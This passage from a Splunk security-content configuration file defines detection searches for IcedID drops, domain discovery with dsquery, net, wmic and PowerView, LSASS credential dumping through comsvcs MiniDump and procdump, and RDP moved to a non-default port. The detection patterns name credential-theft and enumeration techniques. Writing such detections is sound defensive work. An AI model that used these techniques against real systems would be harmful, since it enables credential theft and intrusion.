action.notable.param.rule_title = Download Files Using Telegram action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode= 15 process_name = "telegram.exe" TargetFilename = "*:Zone.Identifier" |stats count min(_time) as firstTime max(_time) as lastTime by dest EventCode process_name process_id TargetFilename Hash | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `download_files_using_telegram_filter` [ESCU - Drop IcedID License dat - Rule] action.escu = 0 action.escu.enabled = 1 description = This search detects the dropping of a suspicious file named "license.dat" in %appdata%. This behavior is seen in recent IcedID malware, where the file contains the actual core bot that is injected into another process to steal banking information. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204", "T1204.002"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search detects the dropping of a suspicious file named "license.dat" in %appdata%. This behavior is seen in recent IcedID malware, where the file contains the actual core bot that is injected into another process to steal banking information. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. 
action.escu.known_false_positives = unknown action.escu.creation_date = 2021-07-30 action.escu.modification_date = 2021-07-30 action.escu.confidence = high action.escu.full_search_name = ESCU - Drop IcedID License dat - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["IcedID"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Drop IcedID License dat - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204", "T1204.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode= 11 TargetFilename = "*\\license.dat" AND (TargetFilename="*\\appdata\\*" OR TargetFilename="*\\programdata\\*") |stats count min(_time) as firstTime max(_time) as lastTime by TargetFilename EventCode process_id process_name dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_icedid_license_dat_filter` [ESCU - DSQuery Domain Discovery - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies "dsquery.exe" execution with arguments looking for `TrustedDomain` query directly on the command-line. This is typically indicative of an Administrator or adversary performing domain trust discovery. 
Note that this query does not identify any other variations of "Dsquery.exe" usage.\ Within this detection, it is assumed `dsquery.exe` is not moved or renamed.\ The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "dsquery.exe" and its parent process.\ DSQuery.exe is natively found in `C:\Windows\system32` and `C:\Windows\syswow64` and only on Server operating systems.\ The following DLL(s) are loaded when DSQuery.exe is launched: `dsquery.dll`. If found loaded by another process, it is possible dsquery is running within that process context in memory.\ In addition to trust discovery, review parallel processes for additional behaviors performed. Identify the parent process and capture any files (batch files, for example) being used. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1482"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies "dsquery.exe" execution with arguments looking for `TrustedDomain` query directly on the command-line. This is typically indicative of an Administrator or adversary performing domain trust discovery. Note that this query does not identify any other variations of "Dsquery.exe" usage.\ Within this detection, it is assumed `dsquery.exe` is not moved or renamed.\ The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "dsquery.exe" and its parent process.\ DSQuery.exe is natively found in `C:\Windows\system32` and `C:\Windows\syswow64` and only on Server operating systems.\ The following DLL(s) are loaded when DSQuery.exe is launched: `dsquery.dll`. 
If found loaded by another process, it is possible dsquery is running within that process context in memory.\ In addition to trust discovery, review parallel processes for additional behaviors performed. Identify the parent process and capture any files (batch files, for example) being used. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives. If there is a true false positive, filter based on command-line or parent process. action.escu.creation_date = 2021-03-31 action.escu.modification_date = 2021-03-31 action.escu.confidence = high action.escu.full_search_name = ESCU - DSQuery Domain Discovery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Domain Trust Discovery", "Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified performing domain discovery on endpoint $dest$ by user $user$. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 72}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 72}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - DSQuery Domain Discovery - Rule action.correlationsearch.annotations = {"analytic_story": ["Domain Trust Discovery", "Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1482"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies "dsquery.exe" execution with arguments looking for `TrustedDomain` query directly on the command-line. This is typically indicative of an Administrator or adversary performing domain trust discovery. Note that this query does not identify any other variations of "Dsquery.exe" usage.\ Within this detection, it is assumed `dsquery.exe` is not moved or renamed.\ The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "dsquery.exe" and its parent process.\ DSQuery.exe is natively found in `C:\Windows\system32` and `C:\Windows\syswow64` and only on Server operating systems.\ The following DLL(s) are loaded when DSQuery.exe is launched: `dsquery.dll`. If found loaded by another process, it is possible dsquery is running within that process context in memory.\ In addition to trust discovery, review parallel processes for additional behaviors performed. 
Identify the parent process and capture any files (batch files, for example) being used. action.notable.param.rule_title = DSQuery Domain Discovery action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=dsquery.exe Processes.process=*trustedDomain* by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dsquery_domain_discovery_filter` [ESCU - Dump LSASS via comsvcs DLL - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the behavior of dumping credentials from memory, a tactic commonly used by adversaries to exploit the Local Security Authority Subsystem Service (LSASS) in Windows, which manages system-level authentication. The detection is made by monitoring logs with process information from endpoints and identifying instances where the rundll32 process is used in conjunction with the comsvcs.dll and MiniDump. This indicates potential LSASS dumping attempts used by threat actors to obtain valuable credentials. The detection is important because credential theft can lead to broader system compromise, persistence, lateral movement, and escalated privileges. No legitimate use of this technique has been identified yet. 
This behavior is often part of more extensive attack campaigns and is associated with numerous threat groups that use the stolen credentials to access sensitive information or systems, leading to data theft, ransomware attacks, or other damaging outcomes. False positives can occur since legitimate uses of the LSASS process can cause benign activities to be flagged. Next steps include reviewing the processes involved in the LSASS dumping attempt after triage and inspecting any relevant on-disk artifacts and concurrent processes to identify the attack source. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the behavior of dumping credentials from memory, a tactic commonly used by adversaries to exploit the Local Security Authority Subsystem Service (LSASS) in Windows, which manages system-level authentication. The detection is made by monitoring logs with process information from endpoints and identifying instances where the rundll32 process is used in conjunction with the comsvcs.dll and MiniDump. This indicates potential LSASS dumping attempts used by threat actors to obtain valuable credentials. The detection is important because credential theft can lead to broader system compromise, persistence, lateral movement, and escalated privileges. No legitimate use of this technique has been identified yet. This behavior is often part of more extensive attack campaigns and is associated with numerous threat groups that use the stolen credentials to access sensitive information or systems, leading to data theft, ransomware attacks, or other damaging outcomes. False positives can occur since legitimate uses of the LSASS process can cause benign activities to be flagged. 
Next steps include reviewing the processes involved in the LSASS dumping attempt after triage and inspecting any relevant on-disk artifacts and concurrent processes to identify the attack source. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = None identified. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Dump LSASS via comsvcs DLL - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Industroyer2", "HAFNIUM Group", "CISA AA22-264A", "Prestige Ransomware", "Credential Dumping", "CISA AA22-257A", "Living Off The Land", "Suspicious Rundll32 Activity", "Data Destruction", "Volt Typhoon", "Flax Typhoon"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified accessing credentials using comsvcs.dll on endpoint $dest$ by user $user$. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Dump LSASS via comsvcs DLL - Rule action.correlationsearch.annotations = {"analytic_story": ["Industroyer2", "HAFNIUM Group", "CISA AA22-264A", "Prestige Ransomware", "Credential Dumping", "CISA AA22-257A", "Living Off The Land", "Suspicious Rundll32 Activity", "Data Destruction", "Volt Typhoon", "Flax Typhoon"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the behavior of dumping credentials from memory, a tactic commonly used by adversaries to exploit the Local Security Authority Subsystem Service (LSASS) in Windows, which manages system-level authentication. The detection is made by monitoring logs with process information from endpoints and identifying instances where the rundll32 process is used in conjunction with the comsvcs.dll and MiniDump. This indicates potential LSASS dumping attempts used by threat actors to obtain valuable credentials. The detection is important because credential theft can lead to broader system compromise, persistence, lateral movement, and escalated privileges. No legitimate use of this technique has been identified yet. 
This behavior is often part of more extensive attack campaigns and is associated with numerous threat groups that use the stolen credentials to access sensitive information or systems, leading to data theft, ransomware attacks, or other damaging outcomes. False positives can occur since legitimate uses of the LSASS process can cause benign activities to be flagged. Next steps include reviewing the processes involved in the LSASS dumping attempt after triage and inspecting any relevant on-disk artifacts and concurrent processes to identify the attack source. action.notable.param.rule_title = Dump LSASS via comsvcs DLL action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*comsvcs.dll* Processes.process=*MiniDump* by Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dump_lsass_via_comsvcs_dll_filter` [ESCU - Dump LSASS via procdump - Rule] action.escu = 0 action.escu.enabled = 1 description = Detect procdump.exe dumping the lsass process. This query looks for both -mm and -ma usage. -mm will produce a mini dump file and -ma will write a dump file with all process memory. Both are highly suspect and should be reviewed. This query does not monitor for the internal name (original_file_name=procdump) of the PE or look for procdump64.exe. Modify the query as needed.\ During triage, confirm this is procdump.exe executing. 
If it is the first time a Sysinternals utility has been run, it is possible there will be a -accepteula on the command line. Review other endpoint data sources for cross-process (injection) activity into lsass.exe. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Detect procdump.exe dumping the lsass process. This query looks for both -mm and -ma usage. -mm will produce a mini dump file and -ma will write a dump file with all process memory. Both are highly suspect and should be reviewed. This query does not monitor for the internal name (original_file_name=procdump) of the PE or look for procdump64.exe. Check the definition of the `process_procdump` macro in your deployment, since it determines which process names and internal names are actually covered, and modify the query as needed.\ During triage, confirm this is procdump.exe executing. If it is the first time a Sysinternals utility has been run, it is possible there will be a -accepteula on the command line. Review other endpoint data sources for cross-process (injection) activity into lsass.exe. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = None identified. 
action.escu.creation_date = 2022-08-31 action.escu.modification_date = 2022-08-31 action.escu.confidence = high action.escu.full_search_name = ESCU - Dump LSASS via procdump - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Credential Dumping", "HAFNIUM Group", "CISA AA22-257A"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified attempting to dump lsass.exe on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Dump LSASS via procdump - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "HAFNIUM Group", "CISA AA22-257A"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Detect procdump.exe dumping the lsass process. This query looks for both -mm and -ma usage. -mm will produce a mini dump file and -ma will write a dump file with all process memory. Both are highly suspect and should be reviewed. 
This query does not monitor for the internal name (original_file_name=procdump) of the PE or look for procdump64.exe. Check the definition of the `process_procdump` macro in your deployment, since it determines which process names and internal names are actually covered, and modify the query as needed.\ During triage, confirm this is procdump.exe executing. If it is the first time a Sysinternals utility has been run, it is possible there will be a -accepteula on the command line. Review other endpoint data sources for cross-process (injection) activity into lsass.exe. action.notable.param.rule_title = Dump LSASS via procdump action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_procdump` (Processes.process=*-ma* OR Processes.process=*-mm*) Processes.process=*lsass* by Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.original_file_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dump_lsass_via_procdump_filter` [ESCU - Elevated Group Discovery With Net - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `net.exe` or `net1.exe` with command-line arguments utilized to query for specific elevated domain groups. Red Teams and adversaries alike use net.exe to enumerate elevated domain groups for situational awareness and Active Directory Discovery to identify high privileged users. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `net.exe` or `net1.exe` with command-line arguments utilized to query for specific elevated domain groups. Red Teams and adversaries alike use net.exe to enumerate elevated domain groups for situational awareness and Active Directory Discovery to identify high privileged users. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. 
action.escu.creation_date = 2021-08-25 action.escu.modification_date = 2021-08-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Elevated Group Discovery With Net - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery", "Volt Typhoon", "Rhysida Ransomware"] action.risk = 1 action.risk.param._risk_message = Elevated domain group discovery enumeration on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 21}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Elevated Group Discovery With Net - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "Volt Typhoon", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 70, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `net.exe` or `net1.exe` with command-line arguments utilized to query for specific elevated domain groups. Red Teams and adversaries alike use net.exe to enumerate elevated domain groups for situational awareness and Active Directory Discovery to identify high privileged users. 
action.notable.param.rule_title = Elevated Group Discovery With Net action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="net.exe" OR Processes.process_name="net1.exe") (Processes.process="*group*" AND Processes.process="*/do*") (Processes.process="*Domain Admins*" OR Processes.process="*Enterprise Admins*" OR Processes.process="*Schema Admins*" OR Processes.process="*Account Operators*" OR Processes.process="*Server Operators*" OR Processes.process="*Protected Users*" OR Processes.process="*Dns Admins*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `elevated_group_discovery_with_net_filter` [ESCU - Elevated Group Discovery with PowerView - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainGroupMember` cmdlet. `Get-DomainGroupMember` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. As the name suggests, `Get-DomainGroupMember` is used to list the members of a specific domain group. Red Teams and adversaries alike use PowerView to enumerate elevated domain groups for situational awareness and Active Directory Discovery to identify high privileged users. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainGroupMember` cmdlet. `Get-DomainGroupMember` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. As the name suggests, `Get-DomainGroupMember` is used to list the members of a specific domain group. Red Teams and adversaries alike use PowerView to enumerate elevated domain groups for situational awareness and Active Directory Discovery to identify high privileged users. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators or power users may use PowerView for troubleshooting. 
action.escu.creation_date = 2024-02-14 action.escu.modification_date = 2024-02-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Elevated Group Discovery with PowerView - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Elevated Group Discovery with PowerView - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 70, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (Message = "*Get-DomainGroupMember*") AND Message IN ("*Domain Admins*","*Enterprise Admins*", "*Schema Admins*", "*Account Operators*" , "*Server Operators*", "*Protected Users*", "*Dns Admins*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Message ComputerName User | rename ComputerName as dest, User as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `elevated_group_discovery_with_powerview_filter` [ESCU - Elevated Group Discovery With Wmic - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to query for specific elevated domain groups through the LDAP WMI namespace. Red Teams and adversaries alike use wmic.exe to enumerate elevated domain groups for situational awareness and Active Directory Discovery to identify high privileged users. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to query for specific elevated domain groups through the LDAP WMI namespace. Red Teams and adversaries alike use wmic.exe to enumerate elevated domain groups for situational awareness and Active Directory Discovery to identify high privileged users. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. 
action.escu.creation_date = 2021-08-25 action.escu.modification_date = 2021-08-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Elevated Group Discovery With Wmic - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Elevated domain group discovery enumeration on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 21}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Elevated Group Discovery With Wmic - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 70, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to query for specific elevated domain groups through the LDAP WMI namespace. Red Teams and adversaries alike use wmic.exe to enumerate elevated domain groups for situational awareness and Active Directory Discovery to identify high privileged users. 
action.notable.param.rule_title = Elevated Group Discovery With Wmic action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="wmic.exe") (Processes.process=*/NAMESPACE:\\\\root\\directory\\ldap*) (Processes.process="*Domain Admins*" OR Processes.process="*Enterprise Admins*" OR Processes.process="*Schema Admins*" OR Processes.process="*Account Operators*" OR Processes.process="*Server Operators*" OR Processes.process="*Protected Users*" OR Processes.process="*Dns Admins*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `elevated_group_discovery_with_wmic_filter` [ESCU - Enable RDP In Other Port Number - Rule] action.escu = 0 action.escu.enabled = 1 description = This search detects a registry modification that enables RDP on a machine under a different (non-default) port number. This technique has been observed in attacks where an adversary attempts lateral movement and remote access to a compromised machine in order to retain control of it. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search detects a registry modification that enables RDP on a machine under a different (non-default) port number. This technique has been observed in attacks where an adversary attempts lateral movement and remote access to a compromised machine in order to retain control of it. 
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = Administrators may legitimately relocate the RDP listener. Note that the search fires on any write of the PortNumber value, including a rewrite of the default 3389, so check registry_value_data during triage. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Enable RDP In Other Port Number - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Prohibited Traffic Allowed or Protocol Mismatch", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = RDP was moved to a non-standard port on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Enable RDP In Other Port Number - Rule action.correlationsearch.annotations = {"analytic_story": ["Prohibited Traffic Allowed or Protocol Mismatch", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields 